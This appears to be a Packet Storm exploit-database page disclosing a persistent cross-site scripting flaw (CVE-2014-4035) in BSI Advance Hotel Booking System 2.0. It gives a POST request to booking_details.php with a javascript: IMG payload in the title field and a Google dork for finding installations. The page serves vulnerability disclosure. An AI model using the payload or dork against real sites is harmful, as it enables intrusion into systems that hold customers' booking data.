Lucene search
Angelo RuwanthaPACKETSTORM:154024HistoryAug 12, 2019 - 12:00 a.m.
BSI Advance Hotel Booking System 2.0 Cross Site Scripting
2019-08-1200:00:00
Angelo Ruwantha
packetstormsecurity.com
153
0.002 Low
EPSS
Percentile
57.5%
`# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035
Vulnerability
========================
[+]Method:POST
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
every parameter injectable :)
`
Related
prion
prion
Cross site scripting
2014-06-11 14:55:00
cvelist
cvelist
CVE-2014-4035
2014-06-11 14:00:00
cve
cve
CVE-2014-4035
2014-06-11 14:55:10
zdt
zdt
nvd
nvd
CVE-2014-4035
2014-06-11 14:55:10
exploitpack
exploitpack
exploitdb
exploitdb